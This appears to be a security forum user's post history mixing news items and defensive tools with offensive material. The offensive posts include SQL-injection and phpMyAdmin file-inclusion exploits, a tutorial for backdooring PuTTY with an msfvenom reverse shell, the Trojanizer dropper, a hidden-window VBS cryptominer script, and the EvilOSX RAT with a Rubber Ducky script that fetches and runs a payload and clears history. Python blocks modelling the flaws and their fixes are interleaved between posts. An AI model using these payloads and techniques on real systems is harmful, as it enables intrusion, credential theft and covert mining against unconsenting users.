Everything posted by Fi8sVrs

  1. The Wi-Fi Alliance today officially launched WPA3, the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks in use today, including the dangerous KRACK attacks.

     WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended to prevent hackers from eavesdropping on your wireless data. However, late last year, security researchers uncovered a severe flaw in the current WPA2 protocol, dubbed KRACK (Key Reinstallation Attack), that made it possible for attackers to intercept, decrypt and even manipulate Wi-Fi network traffic.

     Although most device manufacturers patched their devices against KRACK attacks, the Wi-Fi Alliance, without much delay, rushed to finalize and launch WPA3 in order to address WPA2's technical shortcomings from the ground up.

     What is WPA3? What new security features does WPA3 offer?

     The WPA3 security standard will replace the existing WPA2, which has been around for at least 15 years and is used by billions of devices every day. The new security protocol provides some big improvements for Wi-Fi enabled devices in terms of configuration, authentication, and encryption enhancements, making it harder for hackers to hack your Wi-Fi or eavesdrop on your network.

     On Monday, the Wi-Fi Alliance launched two flavors of the latest security protocol, WPA3-Personal and WPA3-Enterprise, for personal, enterprise, and IoT wireless networks. Here are some key features provided by the new protocol:

     1.) Protection Against Brute-Force Attacks: WPA3 provides enhanced protection against offline brute-force dictionary attacks, making it harder for hackers to crack your Wi-Fi password by trying commonly used passwords over and over again, even if you choose a less complex password.

     2.) WPA3 Forward Secrecy: WPA3 leverages the SAE (Simultaneous Authentication of Equals) handshake to offer forward secrecy, a security feature that prevents attackers from decrypting old captured traffic even if they ever learn the password of a network.

     3.) Protecting Public/Open Wi-Fi Networks: WPA3 strengthens user privacy in open networks through individualized data encryption, a feature that encrypts the wireless traffic between your device and the Wi-Fi access point to mitigate the risk of Man-in-the-Middle (MitM) attacks. To prevent such passive attacks, WPA3 could add support for Opportunistic Wireless Encryption (OWE).

     4.) Strong Encryption for Critical Networks: Using WPA3-Enterprise, critical Wi-Fi networks handling sensitive information (such as government and industrial organizations) can protect their Wi-Fi connections with 192-bit encryption.

     Wi-Fi Easy Connect

     Alongside WPA3, the Wi-Fi Alliance has also announced a new feature, called Wi-Fi Easy Connect, that simplifies the process of pairing smart home gadgets (without any screen or display) to your router. Wi-Fi Easy Connect is a replacement for Wi-Fi Protected Setup (WPS), which has been considered insecure. With support for Easy Connect, you will be able to pair your smart gadget with the router by simply scanning a QR code with your smartphone to have the Wi-Fi credentials automatically sent to the new smart device.

     It should be noted that neither WPA3 nor Wi-Fi Easy Connect will hit the mainstream right away. In fact, it is going to be a years-long process that will require new routers and smart gadgets to support WPA3. Therefore, WPA2 will not stop working any time soon, and devices with WPA3 support will still be able to connect with devices that use WPA2, so your gadgets keep working, but WPA3 support will eventually become mandatory as adoption grows.

     WPA3 is set to roll out later this year and is expected to hit mass adoption in late 2019, when it eventually becomes a requirement for devices to be considered Wi-Fi certified, according to the Wi-Fi Alliance.

     Via thehackernews.com
  2. Well yes, except that none of the top ones detected some rootkits written by an independent developer, I think...
  3. Which other ones? I searched for something serious the other day and found nothing.
  4. Project Cerium: Antivirus. Open Source Antivirus For Humans.

     How to use: clone the repo and run it:

       git clone https://github.com/xedtech/ceriumav.git
       cd ceriumav
       python3 av.py

     Screenshots

     Source
  5. WordPress iThemes Security plugin versions prior to 7.0.3 suffer from a remote SQL injection vulnerability.

       # Exploit Title: WordPress Plugin iThemes Security (better-wp-security) <= 7.0.2 - Authenticated SQL Injection
       # Date: 2018-06-25
       # Exploit Author: Alirim Emini
       # Website: https://www.sentry.co.com/
       # Vendor Homepage: https://ithemes.com/
       # Software Link: https://wordpress.org/plugins/better-wp-security/
       # Version/s: 7.0.2 and below
       # Patched Version: 7.0.3
       # CVE: 2018-12636
       # WPVULNDB: https://wpvulndb.com/vulnerabilities/9099

     Plugin description: iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress.

     Description: WordPress Plugin iThemes Security (better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php.

     Technical details: Parameter orderby is vulnerable because the backend variable $sort_by_column is not escaped.

     File: better-wp-security/core/admin-pages/logs-list-table.php
       Line 271: if ( isset( $_GET['orderby'], $_GET['order'] ) ) {
       Line 272:     $sort_by_column = $_GET['orderby'];

     File: better-wp-security/core/lib/log-util.php
       Line 168: $query .= ' ORDER BY ' . implode( ', ', $sort_by_column );

     Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:

       http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0

     Using SQLMAP:

       sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3

     https://packetstormsecurity.com/files/148294/WordPress-iThemes-Security-SQL-Injection.html
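The root cause in the advisory is that the comma-separated orderby values are imploded straight into ORDER BY. The Python/sqlite3 snippet below is an added example (not the advisory's or the plugin's code): it models that query builder next to a whitelisted version in which only known column names and a known direction can reach the SQL string. The table layout and column names are assumptions for the demo.

```python
import sqlite3

# Columns the log table exposes for sorting (assumed for this example).
ALLOWED_COLUMNS = {"id", "module", "type", "remote_ip", "timestamp"}
ALLOWED_ORDER = {"asc", "desc"}


def build_query_vulnerable(orderby: str, order: str) -> str:
    """Mirrors the unsafe pattern: split the request parameter on commas and
    implode it into ORDER BY with no validation, so any SQL expression passes."""
    sort_by_column = [c.strip() for c in orderby.split(",")]
    return "SELECT * FROM itsec_logs ORDER BY " + ", ".join(sort_by_column) + " " + order


def build_query_safe(orderby: str, order: str) -> str:
    """Every sort token must be a whitelisted identifier and the direction a
    fixed keyword; anything else raises instead of being interpolated."""
    columns = [c.strip() for c in orderby.split(",")]
    for col in columns:
        if col not in ALLOWED_COLUMNS:
            raise ValueError(f"rejected sort column: {col!r}")
    direction = order.strip().lower()
    if direction not in ALLOWED_ORDER:
        raise ValueError(f"rejected sort order: {order!r}")
    # After validation every token is a known identifier, so joining is safe.
    return "SELECT * FROM itsec_logs ORDER BY " + ", ".join(columns) + " " + direction.upper()


def is_rejected(orderby: str, order: str) -> bool:
    """True when the safe builder refuses the supplied parameters."""
    try:
        build_query_safe(orderby, order)
    except ValueError:
        return True
    return False


def run(query: str):
    """Execute a query against a tiny in-memory log table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE itsec_logs (id INTEGER, module TEXT, type TEXT, remote_ip TEXT, timestamp TEXT)"
    )
    conn.executemany("INSERT INTO itsec_logs VALUES (?, ?, ?, ?, ?)", [
        (1, "brute_force", "notice", "203.0.113.9", "2018-06-25 10:00:00"),
        (2, "malware", "warning", "198.51.100.4", "2018-06-25 10:05:00"),
        (3, "brute_force", "notice", "192.0.2.77", "2018-06-25 10:07:00"),
    ])
    rows = conn.execute(query).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    payload = "remote_ip,(select*from(select(sleep(10)))a)"   # the advisory's PoC value
    print("vulnerable builder:", build_query_vulnerable(payload, "asc"))
    print("safe builder rejects it:", is_rejected(payload, "asc"))
    print("safe multi-column sort:", run(build_query_safe("remote_ip,id", "asc")))
```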
  6. jadx-gui --show-bad-code 1.app.apk
  7. Send me a PM with the sites and what you want to change on them.
  8. Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdoor a PE file, in this case the PuTTY client. I used the following software setup: Windows 10 Pro 32 Bit, PuTTY, Stud_PE, Immunity Debugger.

     Before we get our hands into assembly, I want to explain what we will do. We will add a section header named .evil to our file and hijack the file's execution flow. At the entry point we will redirect the execution to our shellcode, and after gaining our shell the ordinary application runs (PuTTY starts).

     #0x01 Adding Section

     At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pretty self-explanatory. I chose a section size of 1500 bytes, which are filled with null bytes. That's more than enough for our shellcode. After saving the file and loading it into Immunity you can see the differences between the two files (the new section .evil has been spawned). And if you look at the address of .evil you will see the following (our predefined null bytes) -> Great!

     While checking our new section you may have noticed that the addresses have slightly changed. The last 4 bytes are always null bytes, but the first 4 bytes change with every reload of the file: 00FB0000 <-> 00250000. That's a kernel protection, ASLR; you can find more information about this countermeasure here. This makes some more work, but isn't a problem (more later).

     #0x02 Hijack Execution Flow

     Now we are looking at the entry point of our file in Immunity. The first instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil). Before changing any assembly instruction, copy the 'old' instructions to a text file, because we are going to resume the application flow after executing our shellcode. Mark the first instruction and type "jmp [address of .evil]", in my case "jmp 0x002E3000". After hitting enter you will see the following: Save the changes to a new file and open it in Immunity. Now we take the first instruction with F7 and land in our code cave of null bytes at the .evil address. For our testing purposes we replace the null bytes with NOPs. To do so just mark all the null bytes of the code cave and do the following: We save the state of our registers on the top of the stack through the assembly instructions pushad and pushfd. At the end of our code cave we restore our register states with popfd and popad. So far no problems (hopefully).

     Now we do some math to counter the ASLR protection. We want to restore all overwritten functions at the end of our code cave and jump right back into the 'old' execution flow. If you look at the entry point of our file, you will see that only the call instruction is missing. Without ASLR enabled we could use the saved address from our text file just like "call 0x002B8265", but you see that the address of the second instruction "jmp 0x002B7E6E" has also changed... ASLR, hurray! What now? We have to determine the offset between the old addresses to calculate the new overwritten call instruction. Instead of trying to explain the several locations, addresses and relations, I try to show it in the following pictures (if this isn't enough, please tell me via Twitter and I will add text sections). In the end we got the 'new' address for our overwritten call instruction, which is 0x13F8265. We place this call instruction right behind the restored registers (pushfd, pushad). Now we only need to jmp to the next ordinary instruction at the entry point via "jmp 0x01067FD8" and the execution will flow.

     #0x03 Inject Shellcode

     Choose your favourite shellcode or generate a new one. I used the following command: msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex. Then use the binary paste function of Immunity to replace some of our NOPs with the shellcode. Save the file and voila, you successfully backdoored a PE file!

     Ok, just one thing is missing. The shellcode from msfvenom uses the WaitForSingleObject function, and the default values prevent the application from executing until the shell is released. To solve this, change the "DEC ESI" code at the end of the shellcode to a NOP.

     #0x04 PoC

     Start your listener and fire up the application. Thanks for reading, and if you like this post, check my Twitter account please! xD

     Source: hansesecure.de
  9. Author: @Ambulong

     Security team ChaMd5 disclosed a Local File Inclusion vulnerability in the latest phpMyAdmin version, 4.8.1, and exploiting this vulnerability may lead to Remote Code Execution. In this article, we will use VulnSpy's online phpMyAdmin environment to demonstrate the exploit of this vulnerability.

     VulnSpy's online phpMyAdmin environment address: http://www.vulnspy.com/phpmyadmin-4.8.1/

     Vulnerability Details

     1. Lines 54-63 in file /index.php:

       // If we have a valid target, let's load that script instead
       if (! empty($_REQUEST['target'])
           && is_string($_REQUEST['target'])
           && ! preg_match('/^index/', $_REQUEST['target'])
           && ! in_array($_REQUEST['target'], $target_blacklist)
           && Core::checkPageValidity($_REQUEST['target'])
       ) {
           include $_REQUEST['target'];
           exit;
       }

     2. Core::checkPageValidity in /libraries/classes/Core.php:

       /**
        * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist)
        *
        * checks given $page against given $whitelist and returns true if valid
        * it optionally ignores query parameters in $page (script.php?ignored)
        *
        * @param string &$page     page to check
        * @param array  $whitelist whitelist to check page against
        *
        * @return boolean whether $page is valid or not (in $whitelist or not)
        */
       public static function checkPageValidity(&$page, array $whitelist = [])
       {
           if (empty($whitelist)) {
               $whitelist = self::$goto_whitelist;
           }
           if (! isset($page) || !is_string($page)) {
               return false;
           }

           if (in_array($page, $whitelist)) {
               return true;
           }

           $_page = mb_substr(
               $page,
               0,
               mb_strpos($page . '?', '?')
           );
           if (in_array($_page, $whitelist)) {
               return true;
           }

           $_page = urldecode($page);
           $_page = mb_substr(
               $_page,
               0,
               mb_strpos($_page . '?', '?')
           );
           if (in_array($_page, $whitelist)) {
               return true;
           }

           return false;
       }

     Core::checkPageValidity can be bypassed by using double encoding like %253f.

     Exploit

     An attacker can use this vulnerability to include the session file, turning it into a Remote Code Execution vulnerability.

     1. Use username root, password toor to log into phpMyAdmin.
     2. Run the SQL query: select '<?php phpinfo();exit;?>'
     3. Get your session ID. The session ID is the phpMyAdmin item in your cookie.
     4. Include the session file: http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

     Source: blog.vulnspy.com
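The check above validates one string while index.php includes another: the third branch URL-decodes the value a second time and strips everything after the '?' that decoding reveals, so the whitelist match succeeds on "db_sql.php" while the raw, still-encoded string goes to include. The Python below is an added example (not phpMyAdmin's code) that models the 4.8.1 check next to a hardened resolver that validates exactly the value the caller will use and returns only that canonical name; the whitelist subset and the hardened logic are assumptions of this example, not the upstream patch.

```python
from urllib.parse import unquote_plus

# Small subset of phpMyAdmin's goto whitelist (assumed; the real list is longer).
GOTO_WHITELIST = ["db_sql.php", "db_structure.php", "sql.php", "tbl_sql.php"]


def _strip_query(page: str) -> str:
    """mb_substr($page, 0, mb_strpos($page . '?', '?')): the text before the first '?'."""
    return page.split("?", 1)[0]


def check_page_validity_4_8_1(page, whitelist=GOTO_WHITELIST) -> bool:
    """Model of Core::checkPageValidity in 4.8.1. `page` is the value PHP has already
    decoded once from the query string, so %253f in the URL arrives here as %3f."""
    if not isinstance(page, str):
        return False
    if page in whitelist:
        return True
    if _strip_query(page) in whitelist:
        return True
    # Third branch: decode *again* (PHP urldecode), then strip at '?'. A %3f turns
    # into '?', the traversal after it is discarded, and the bare script name
    # matches, even though the caller never sees this decoded form.
    if _strip_query(unquote_plus(page)) in whitelist:
        return True
    return False


def included_path_4_8_1(page):
    """What index.php hands to include when the 4.8.1 check passes: the raw value."""
    return page if check_page_validity_4_8_1(page) else None


def resolve_target_hardened(page, whitelist=GOTO_WHITELIST):
    """Hardened variant (this example's design, not the upstream fix): no second
    decode, exact whitelist match on the query-stripped value, and the canonical
    name is returned so the caller can only ever include a whitelisted script."""
    if not isinstance(page, str) or not page:
        return None
    name = _strip_query(page)
    if name not in whitelist:
        return None
    return name


if __name__ == "__main__":
    # Constructed traversal value, already decoded once by PHP (session id is a placeholder).
    crafted = "db_sql.php%3f/../../../../var/lib/php/sessions/sess_PLACEHOLDER"
    print("4.8.1 check passes:", check_page_validity_4_8_1(crafted))
    print("4.8.1 would include:", included_path_4_8_1(crafted))
    print("hardened resolves to:", resolve_target_hardened(crafted))
    print("hardened on legit value:", resolve_target_hardened("db_sql.php?db=test"))
```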
  10. ARPPD - ARP Poisoning Defender

     This is a small script I have written in C to provide protection against malicious ARP attacks that change the gateway's MAC address in the ARP table of a victim's PC.

     How it works

     The program saves the gateway's MAC and IP address when started. It then scans every incoming ARP packet to see if it has the gateway's IP as its ARP source. It blocks these packets (without a delay, unlike other ARP defending scripts) using arptables, and instantly updates the ARP table to match the gateway's IP and MAC. It keeps ARP packets from the attacker's MAC address blocked for 5 minutes. When the program exits, it allows all MAC addresses to send ARP packets again (to the PC running the script), and flushes the ARP table.

     Cross Platform

     For now, the script only works on Linux. I will try to release a win64 version ASAP.

     Installation and build

     ARPPD needs arptables to run, so just install it: sudo apt-get install arptables

     There's a pre-built executable in the builds folder, or build it yourself. To build: run compile_arppd_linux, or go to the main directory and run: gcc -o builds/defender-win64 src-win64/defender.c -lpcap -pthread

     Malicious ARP Packets

     When ARPPD detects a malicious ARP packet, it will look like this:

     Video

     Download: ARPPD-master.zip or git clone https://github.com/Prodicode/ARPPD.git

     Source
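The detection rule described in "How it works" (remember the gateway's IP/MAC binding at start-up, then flag any ARP packet whose sender IP is the gateway but whose MAC differs) can be checked without libpcap or arptables. The Python below is an added example, not ARPPD's code: it parses raw Ethernet/ARP frames built in memory and applies that rule; the gateway, victim and attacker addresses are constructed test values.

```python
import struct

ETHERTYPE_ARP = 0x0806


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_arp(frame: bytes):
    """Parse an Ethernet II frame carrying IPv4-over-Ethernet ARP.
    Returns a dict of the ARP fields, or None for anything that is not such a frame."""
    if len(frame) < 14 + 28:
        return None
    _dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {
        "eth_src": mac_str(src),
        "op": {1: "request", 2: "reply"}.get(oper, str(oper)),
        "sender_mac": mac_str(sha),
        "sender_ip": ip_str(spa),
        "target_mac": mac_str(tha),
        "target_ip": ip_str(tpa),
    }


class GatewayGuard:
    """Holds the trusted gateway binding captured at start-up (as ARPPD does) and
    flags every ARP packet that claims the gateway IP from any other MAC."""

    def __init__(self, gateway_ip: str, gateway_mac: str):
        self.gateway_ip = gateway_ip
        self.gateway_mac = gateway_mac.lower()
        self.blocked = set()   # source MACs an arptables rule would now drop

    def inspect(self, frame: bytes):
        """Return an alert dict for a poisoning attempt, else None."""
        arp = parse_arp(frame)
        if arp is None or arp["sender_ip"] != self.gateway_ip:
            return None
        # Both the ARP sender MAC and the frame's source MAC must be the real gateway.
        if arp["sender_mac"] == self.gateway_mac and arp["eth_src"] == self.gateway_mac:
            return None
        self.blocked.add(arp["eth_src"])
        return {"attacker_mac": arp["eth_src"], "claimed_mac": arp["sender_mac"], "op": arp["op"]}


def build_arp(eth_src: str, oper: int, sha: str, spa: str, tha: str, tpa: str) -> bytes:
    """Construct a sample ARP frame for testing (not a real capture)."""
    def mac(s): return bytes(int(x, 16) for x in s.split(":"))
    def ip(s): return bytes(int(x) for x in s.split("."))
    dst = b"\xff" * 6 if oper == 1 else mac(tha)    # requests are broadcast
    eth = struct.pack("!6s6sH", dst, mac(eth_src), ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, oper, mac(sha), ip(spa), mac(tha), ip(tpa))
    return eth + arp


if __name__ == "__main__":
    # Constructed addresses: gateway, a victim host and an attacker on the same LAN.
    guard = GatewayGuard("192.0.2.1", "02:00:00:00:00:01")
    legit = build_arp("02:00:00:00:00:01", 2, "02:00:00:00:00:01", "192.0.2.1", "02:00:00:00:00:20", "192.0.2.20")
    spoof = build_arp("02:00:00:00:00:99", 2, "02:00:00:00:00:99", "192.0.2.1", "02:00:00:00:00:20", "192.0.2.20")
    print("legit reply:", guard.inspect(legit))
    print("spoofed reply:", guard.inspect(spoof))
    print("blocked MACs:", guard.blocked)
```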
  12. TROJANIZER

     Version release: v1.1 (Stable)
     Author: pedro ubuntu [ r00t-3xp10it ]
     Codename: Troia_Revisited
     Distros Supported: Ubuntu, Kali, Mint, Parrot OS
     Suspicious-Shell-Activity (SSA) RedTeam develop @2017

     FRAMEWORK DESCRIPTION

     The Trojanizer tool uses WinRAR (SFX) to compress the two files input by the user, and transforms them into an SFX executable (.exe) archive. When the SFX archive is executed it will run both files (our payload and the legit application at the same time). To make the archive less suspicious to the target at execution time, Trojanizer will try to replace the default icon (.ico) of the SFX file with a user-selected one, and suppress all SFX archive sandbox messages (Silent=1 | Overwrite=1).

     'Trojanizer will not build trojans, but from the target's perspective, it replicates trojan behavior' (executes the payload in the background, while the legit application executes in the foreground).

     DEPENDENCIES (backend applications)

     Zenity (bash GUIs) | Wine (x86|x64) | WinRAR.exe (installed in Wine)
     "Trojanizer.sh will download/install all dependencies as they are needed"

     NOTE: It is recommended to edit and configure the option SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.

     PAYLOADS (agents) ACCEPTED

     .exe | .bat | .vbs | .ps1
     "All payloads that windows/SFX can auto-extract-execute"
     HINT: If 'SINGLE_EXEC=ON' is selected in the settings file, then Trojanizer will accept any kind of extension as input.

     LEGIT APPLICATIONS ACCEPTED (decoys)

     .exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
     "All applications that windows/SFX can auto-extract-execute"

     Advanced Settings: Trojanizer and APPL Whitelisting Bypasses

     Framework Screenshots

     Video Tutorials: Trojanizer - AVG anti-virus fake installer (trojan behavior); Trojanizer - single_file_execution (not trojan behavior)

     Download/Install

     1º - Download the framework from GitHub: git clone https://github.com/r00t-3xp10it/trojanizer.git
     2º - Set file execution permissions: cd trojanizer; sudo chmod +x *.sh
     3º - Configure the framework: nano settings
     4º - Run the main tool: sudo ./Trojanizer.sh

     Source
  13. While fuzzing is known to be a powerful mechanism for fingerprinting and enumerating bugs within hardware and software systems, the application of this technique to wireless systems remains nontrivial due to fragmented and siloed tools. Join us as we cover wireless fuzzing fundamentals and introduce a new tool to unify the approach across protocols, radios, and drivers.

     About the Speakers

     Matt Knight (@embeddedsec) is a center and left wing for the San Francisco Desert Owls ice hockey team. When his schedule allows he moonlights as a software engineer and security researcher, where he explores the boundaries between software, hardware, and wireless systems. With specific interests in RF networks and physical layers, he notably reverse engineered the LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College.

     Ryan Speers is a security researcher and developer who enjoys embedded systems, low-power radio protocols, and reversing proprietary systems. He has worked in offensive and defensive roles on networks, Windows, micro controllers, and many things in-between. As co-founder at River Loop Security, he tests embedded systems for security issues, and helps clients build more secure systems. He is also Director of Research for Ionic Security where he leads system and cryptographic research. He has previously spoken at a number of security conferences, including Troopers 14, and written some articles for journals ranging from peer-reviewed academic publications to PoC

     link: https://www.troopers.de/troopers18/agenda/rgdyd3/
  14. Hidden.vbs

       Set WshShell = CreateObject("WScript.Shell")
       WshShell.Run chr(34) & "miner.bat" & Chr(34), 0
       Set WshShell = Nothing

     Miner.bat

       minergate-cli --user email@gmail.com --xmr 1

     Minergate: https://minergate.com

     Source: fsecu
  15. AlphaBay Market was by far the largest and most prolific provider of cyber crime and fraudulent services in the world prior to its seizure by the FBI on July 4, 2017. While the Tor-based marketplace was most famous for the sale of narcotics, firearms, and stolen goods, AlphaBay’s forum was the epicenter of the English-speaking cyber criminal community. During the site’s tenure, it provided a rich source of intelligence on the tactics, techniques, and operations of cyber criminal groups targeting a wide range of corporations and selling exfiltrated data through the marketplace securely and anonymously. This included visibility into the attack cycle, AlphaBay operating as a bridge between the English and Russian language cyber criminal communities, and the likely role of AlphaBay’s administrators in cryptocurrency market manipulation on a large scale. This presentation will discuss iDefense’s research into AlphaBay Market as a case study on how in-depth analysis of underground communities can contribute to an organization’s security posture. It will provide a detailed discussion of the tradecraft and methodologies used for underground intelligence, such as the use of undercover personas and how to apply social engineering techniques to gain additional intelligence. It will also discuss the strengths and weaknesses of such an approach and the risks associated with cyber underground collection. Finally, the case study will present lessons learned from engagement and analysis of criminal underground communities and how attendees can integrate cyber underground intelligence into their threat intelligence program. Christy Quinn (@ChristyQuinn), Security Specialist – Cyber Threat Intelligence, iDefense – Accenture Security
  16. EvilOSX

     A pure Python, post-exploitation RAT (Remote Administration Tool) for macOS / OS X.

     Features: Emulate a simple terminal instance; Undetected by anti-virus (OpenSSL AES-256 encrypted payloads, HTTPS communication); Multi-threaded; No client dependencies (pure Python); Persistent; Simple extendable module system; Retrieve Chrome passwords; Retrieve iCloud tokens and contacts; Phish for iCloud passwords via iTunes; Download and upload files; Take a picture using the webcam; Record microphone input; iTunes iOS backup enumeration; Retrieve or monitor the clipboard; Retrieve browser history (Chrome and Safari); Attempt to get root via local privilege escalation; Auto installer, simply run EvilOSX on your target and the rest is handled automatically.

     How To Use

     The server side requires python3 to run (probably already installed on your system).

       # Clone or download this repository
       $ git clone https://github.com/Marten4n6/EvilOSX
       # Install dependencies required by the server
       $ sudo pip3 install -r requirements.txt
       # Go into the repository
       $ cd EvilOSX
       # Build a launcher to infect your target
       $ python builder.py
       # Start listening for connections
       $ python start.py
       # Lastly, run the built launcher on your target

     Because payloads are created unique to the target system (automatically by the server), the server must be running when any client connects for the first time.

     Screenshots

     Motivation

     This project was created to be used with my Rubber Ducky; here's the simple script:

       REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
       REM Also see https://ducktoolkit.com/vidpid/
       DELAY 1000
       GUI SPACE
       DELAY 500
       STRING Termina
       DELAY 1000
       ENTER
       DELAY 1500
       REM Kill all terminals after x seconds
       STRING screen -dm bash -c 'sleep 6; killall Terminal'
       ENTER
       STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
       ENTER

     Takes about 10 seconds to backdoor any unlocked Mac, which is...... nice.

     Terminal is spelt that way intentionally; on some systems Spotlight won't find the terminal otherwise. To bypass the keyboard setup assistant make sure you change the VID&PID, which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for.

     Source
  17. Shadow-box: Lightweight Hypervisor-Based Kernel Protector

     Introduction of Shadow-Box

     Shadow-box is a security monitoring framework for operating systems using state-of-the-art virtualization technologies. Shadow-box has a novel architecture inspired by a shadow play. We made Shadow-box from scratch, and it is primarily composed of a lightweight hypervisor and a security monitor. The lightweight hypervisor, Light-box, efficiently isolates an OS inside a guest machine and projects static and dynamic kernel objects of the guest into the host machine so that our security monitor in the host can investigate the projected images. The security monitor, Shadow-Watcher, places event monitors on static kernel elements and tests the security of dynamic kernel elements. Shadow-box manipulates address translations from the guest physical address to the host physical address in order to exclude unauthorized accesses to the host and the hypervisor spaces. In that way, Shadow-box can properly introspect the guest operating system and mediate all accesses, even when the operating system is compromised.

     Videos

     Architecture of Shadow-Box

     We explain how we designed the Light-box and the Shadow-watcher. It is designed to support a lightweight and practical security monitoring framework using virtualization technologies. We developed a security monitoring framework, Shadow-box, that keeps an OS safe by filtering out unauthorized accesses to important kernel elements and defending the integrity of kernel elements periodically. Shadow-box relies upon its two subparts: a lightweight hypervisor and a security monitor. The lightweight hypervisor, Light-box, efficiently isolates an OS inside a guest machine and projects static and dynamic kernel objects of the guest into the host machine, so that our security monitor in the host can investigate the projected images. The security monitor, Shadow-watcher, places event monitors on static kernel elements and tests the security of dynamic kernel elements. Running inside the host, it can test the security of the guest without malicious interference even when the guest OS is compromised.

     If you want to know more about Shadow-box, please see my presentation and paper at Black Hat Asia 2017 and HITBSecConf 2017.

     Download: shadow-box-for-x86-master.zip or git clone https://github.com/kkamagui/shadow-box-for-x86.git

     Source
  18. Facebook-Video-Downloader, version 1.0.0. Facebook Video Downloader (CLI) for Linux systems, coded in PHP.

     How to use:

       git clone https://github.com/Tuhinshubhra/Facebook-Video-Downloader
       cd Facebook-Video-Downloader
       php fb.php

     Enter the URL, for example https://www.facebook.com/cctvcom/videos/1410869539034155/, then enter the file name. DONE.

     Mirror: fb.php

       <?php
       // Fetch a URL with cURL, following redirects and sending a desktop user agent.
       function curl($url) {
           $curl = curl_init($url);
           curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
           curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13");
           curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
           $content = curl_exec($curl);
           curl_close($curl);
           return $content;
       }

       system("clear");
       // Banner (the ASCII-art version did not survive extraction).
       echo "FACEBOOK VIDEO DOWNLOADER\nVERSION 1.0.0 CREATED BY R3D#@X0r\n";
       echo "\n\n";
       echo "[#] Enter Video URL (https://www.facebook.com/user/video/id) : ";
       $v = trim(fgets(STDIN, 1024));
       echo "\n\n[#] Enter Video Name To Save As : ";
       $name = trim(fgets(STDIN, 1024));

       // The mobile (mbasic) site exposes the video through a plain redirect link.
       $url = str_replace('www', 'mbasic', $v);
       $s = curl($url);
       //echo $s;
       $vurl = preg_match('/<a href=\"\/video_redirect\/\?src\=(.*?)\"/ims', $s, $matches) ? $matches[1] : null;
       if ($vurl === null) {
           echo "\n\n[-] Could not find a video link on that page.\n\n";
           exit(1);
       }
       $vu = urldecode($vurl);

       echo "\n\n[+] Downloading... \n\n\n";
       // Both user-controlled values are passed through escapeshellarg so they cannot
       // break out of the wget command line.
       $d = 'wget -O ' . escapeshellarg($name . '.mp4') . ' --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6" ' . escapeshellarg($vu) . ' -q --show-progress';
       system($d);
       echo "\n\n[+] Done.. Saved As : " . $name . ".mp4\n\n";
       exit(0);
       ?>

     Source
  19. Apple is worried about the battery drain from background cryptocurrency mining.

     Apple recently announced new restrictions on the use of cryptocurrencies on iPhones and iPads, a change first noticed by Apple Insider on Monday. "Apps may not mine for cryptocurrencies unless the processing is performed off device," Apple's app store guidelines for iOS now say. This requirement was absent from the same document just a few weeks ago.

     Apple's new policy is apparently motivated in part by concerns that cryptocurrency mining could drain the batteries of mobile devices. "Apps, including any third party advertisements displayed within them, may not run unrelated background processes, such as cryptocurrency mining," the policy states.

     Websites have been battling this issue for months: people submitting scammy ads to ad networks that hijack the user's CPU to mine cryptocurrency and send the profits back to the admaker. YouTube was briefly serving up these ads before Google noticed the problem and banned the ads.

     But Apple's new policy seems to go beyond obviously abusive cases of surreptitious cryptocurrency mining. The guidelines ban any on-device mining, even if users deliberately download an app whose explicit purpose is to mine for cryptocurrency.

